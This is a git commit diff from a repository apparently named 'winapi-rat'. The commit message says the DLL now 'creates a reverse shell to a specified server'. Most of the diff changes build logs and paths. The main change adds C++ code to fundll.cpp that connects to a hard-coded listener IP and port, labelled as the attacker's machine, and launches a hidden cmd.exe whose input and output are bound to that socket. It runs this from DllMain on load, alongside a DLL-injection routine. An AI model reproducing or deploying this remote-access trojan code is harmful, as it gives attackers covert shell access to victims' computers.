Improved some stuff, cleaned some stuff. Now after executing loader the dll creates a reverse shell to a specified server.

This commit is contained in:
hellisabove
2023-07-20 01:46:07 +03:00
parent 5a7024e1fa
commit eb9959e01e
53 changed files with 94 additions and 98 deletions
-13
@@ -1,13 +0,0 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
+4 -5
@@ -1,10 +1,9 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp
tools.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
Generating code
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
-2
@@ -1,2 +0,0 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
+16 -16
@@ -1,16 +1,16 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
+1 -1
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
+42 -25
@@ -1,42 +1,59 @@
#include <winsock2.h>
#include <stdio.h>
#include "tools.h"
BOOL was_dllmain_called = FALSE;
DWORD dll_param;
#pragma comment(lib, "ws2_32")
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
int reverse(void) {
WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// listener ip, port on attacker's machine
char* ip = "192.168.1.240";
short port = 4444;
// init socket lib
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
sock.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
// start cmd.exe with redirected streams
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
exit(0);
}
extern "C" __declspec(dllexport) void FunEntry() {
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
DWORD dll_param;
char dll_path[MAX_PATH];
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
char test[1024];
wsprintfA(test, "%s", dll_path);
MessageBoxA(0, test, "", 0);
// inject dll
reverse();
Tools::AutoInject(target_path, dll_path);
}
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
dll_param = (DWORD)Base;
was_dllmain_called = TRUE;
switch (Callback) {
case DLL_PROCESS_ATTACH:
break;
FunEntry();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" __declspec(dllexport) void MainBitch() {
if (was_dllmain_called) {
while (TRUE) {
char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
}
} else {
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
}
}
-1
@@ -1,5 +1,4 @@
#include <Windows.h>
#pragma once
namespace Tools {